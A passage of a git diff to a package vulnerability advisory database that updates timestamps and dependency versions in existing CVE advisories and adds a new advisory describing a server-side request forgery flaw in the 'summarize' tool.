"range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-semgrep-CVE-2022-40896.json b/advisories/BREW-semgrep-CVE-2022-40896.json index 236acf63467..3e47d027f60 100644 --- a/advisories/BREW-semgrep-CVE-2022-40896.json +++ b/advisories/BREW-semgrep-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2022-40896", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-semgrep-CVE-2024-3651.json b/advisories/BREW-semgrep-CVE-2024-3651.json index dcf67d4f5d8..a324445ccb8 100644 --- a/advisories/BREW-semgrep-CVE-2024-3651.json +++ b/advisories/BREW-semgrep-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2024-3651", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-semgrep-CVE-2026-28684.json b/advisories/BREW-semgrep-CVE-2026-28684.json index 59c344f1800..97641a9d41e 100644 --- a/advisories/BREW-semgrep-CVE-2026-28684.json +++ b/advisories/BREW-semgrep-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2026-28684", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-semgrep-CVE-2026-4539.json b/advisories/BREW-semgrep-CVE-2026-4539.json index 13e9aea6c6e..838d95634e9 100644 --- a/advisories/BREW-semgrep-CVE-2026-4539.json +++ b/advisories/BREW-semgrep-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2026-4539", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-semgrep-CVE-2026-45409.json b/advisories/BREW-semgrep-CVE-2026-45409.json index ec5f2f197ba..153eea71005 100644 --- a/advisories/BREW-semgrep-CVE-2026-45409.json +++ b/advisories/BREW-semgrep-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2026-45409", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-snapcraft-CVE-2026-59939.json b/advisories/BREW-snapcraft-CVE-2026-59939.json index 3d676a5c719..dc06a52b289 100644 --- a/advisories/BREW-snapcraft-CVE-2026-59939.json +++ b/advisories/BREW-snapcraft-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-59939", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-08-22T09:34:34Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-snyk-agent-scan-CVE-2015-8557.json b/advisories/BREW-snyk-agent-scan-CVE-2015-8557.json index 5689155ab70..c1fd42abf5e 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2015-8557.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2015-8557", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2020-7694.json b/advisories/BREW-snyk-agent-scan-CVE-2020-7694.json index 50bc6fbfe7e..390ebe5a73b 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2020-7694.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2020-7694", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2020-7695.json b/advisories/BREW-snyk-agent-scan-CVE-2020-7695.json index 636a563e3bd..cbbe979b159 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2020-7695.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2020-7695", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2021-20270.json b/advisories/BREW-snyk-agent-scan-CVE-2021-20270.json index 5cd98e94e6e..a0e8690854f 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2021-20270.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2021-20270", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2021-27291.json b/advisories/BREW-snyk-agent-scan-CVE-2021-27291.json index 3359cb553f9..3ae45846306 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2021-27291.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2021-27291", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2022-40896.json b/advisories/BREW-snyk-agent-scan-CVE-2022-40896.json index 9e1eb88fb48..b21aff75cd9 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2022-40896.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2022-40896", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2024-3651.json b/advisories/BREW-snyk-agent-scan-CVE-2024-3651.json index 3d54d4d2849..beebe5a07e2 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2024-3651.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2024-3651", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2026-28684.json b/advisories/BREW-snyk-agent-scan-CVE-2026-28684.json index afdbc833368..609601a77a8 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2026-28684.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2026-28684", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2026-4539.json b/advisories/BREW-snyk-agent-scan-CVE-2026-4539.json index 3589972d665..81ab22c1fee 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2026-4539.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2026-4539", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-snyk-agent-scan-CVE-2026-45409.json b/advisories/BREW-snyk-agent-scan-CVE-2026-45409.json index dde85c9d4dd..dc4761b9d22 100644 --- a/advisories/BREW-snyk-agent-scan-CVE-2026-45409.json +++ b/advisories/BREW-snyk-agent-scan-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snyk-agent-scan-CVE-2026-45409", "published": "2026-08-13T17:35:48Z", - "modified": "2026-08-13T17:35:48Z", + "modified": "2026-08-22T09:34:36Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-style-dictionary-CVE-2026-54639.json b/advisories/BREW-style-dictionary-CVE-2026-54639.json index db2951edd4c..5de2a7fed8b 100644 --- a/advisories/BREW-style-dictionary-CVE-2026-54639.json +++ b/advisories/BREW-style-dictionary-CVE-2026-54639.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-style-dictionary-CVE-2026-54639", "published": "2026-08-13T17:41:17Z", - "modified": "2026-08-13T17:41:17Z", + "modified": "2026-08-22T09:39:37Z", "upstream": [ "GHSA-vj5c-m527-mpff", "CVE-2026-54639" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "style-dictionary", - "subject_version": "5.5.1", - "key": "pkg:npm/style-dictionary@5.5.1" + "subject_version": "5.5.2", + "key": "pkg:npm/style-dictionary@5.5.2" } ] }, diff --git a/advisories/BREW-summarize-CVE-2026-53782.json b/advisories/BREW-summarize-CVE-2026-53782.json new file mode 100644 index 00000000000..ca0218dc55e --- /dev/null +++ b/advisories/BREW-summarize-CVE-2026-53782.json @@ -0,0 +1,96 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-summarize-CVE-2026-53782", + "published": "2026-08-22T09:39:43Z", + "modified": "2026-08-22T09:39:43Z", + "upstream": [ + "CVE-2026-53782", + "GHSA-3vx2-vqx8-jxfg" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "summarize", + "purl": "pkg:brew/summarize" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.21.11" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.17.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "git", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "git", + "ecosystem": "GIT", + "name": "https://github.com/steipete/summarize", + "subject_version": "0.21.11", + "key": "https://github.com/steipete/summarize" + }, + { + "strategy": "registry", + "ecosystem": "npm", + "name": "@steipete/summarize", + "subject_version": "0.21.11", + "key": "pkg:npm/%40steipete/summarize@0.21.11" + } + ] + }, + "summary": "Summarize < 0.17.0 SSRF via podcast:transcript URL fetch", + "details": "Summarize before 0.17.0 contains a server-side request forgery vulnerability that allows attackers who control a podcast RSS feed to direct the host to fetch transcript content from loopback addresses, link-local addresses, RFC 1918 private ranges, or other reserved destinations by supplying malicious podcast:transcript URL values. Attackers can bypass protections through DNS rebinding and redirect-based techniques, as redirect targets are not revalidated and hostnames are not resolved before request dispatch, exposing internal service responses through the summarization flow.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/53xxx/CVE-2026-53782.json" + }, + { + "type": "ADVISORY", + "url": "https://github.com/steipete/summarize/releases/tag/v0.17.0" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53782" + }, + { + "type": "ADVISORY", + "url": "https://www.vulncheck.com/advisories/summarize-ssrf-via-podcast-transcript-url-fetch" + }, + { + "type": "REPORT", + "url": "https://github.com/steipete/summarize/pull/239" + }, + { + "type": "FIX", + "url": "https://github.com/steipete/summarize/commit/3c5522440c4833dde033e226baa39e6dda1dfc75" + }, + { + "type": "PACKAGE", + "url": "https://github.com/steipete/summarize" + } + ] +} diff --git a/advisories/BREW-torrra-CVE-2015-8557.json b/advisories/BREW-torrra-CVE-2015-8557.json index 4f7a43e10b8..266962f58a8 100644 --- a/advisories/BREW-torrra-CVE-2015-8557.json +++ b/advisories/BREW-torrra-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2015-8557", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.19.2" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-torrra-CVE-2021-20270.json b/advisories/BREW-torrra-CVE-2021-20270.json index 119106c8eb0..e056f9d766d 100644 --- a/advisories/BREW-torrra-CVE-2021-20270.json +++ b/advisories/BREW-torrra-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2021-20270", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.19.2" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-torrra-CVE-2021-27291.json b/advisories/BREW-torrra-CVE-2021-27291.json index b9f136256b8..8421cf31425 100644 --- a/advisories/BREW-torrra-CVE-2021-27291.json +++ b/advisories/BREW-torrra-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2021-27291", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.19.2" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-torrra-CVE-2022-40896.json b/advisories/BREW-torrra-CVE-2022-40896.json index 87b500cf6f7..b397b56c4cd 100644 --- a/advisories/BREW-torrra-CVE-2022-40896.json +++ b/advisories/BREW-torrra-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2022-40896", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.19.2" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git 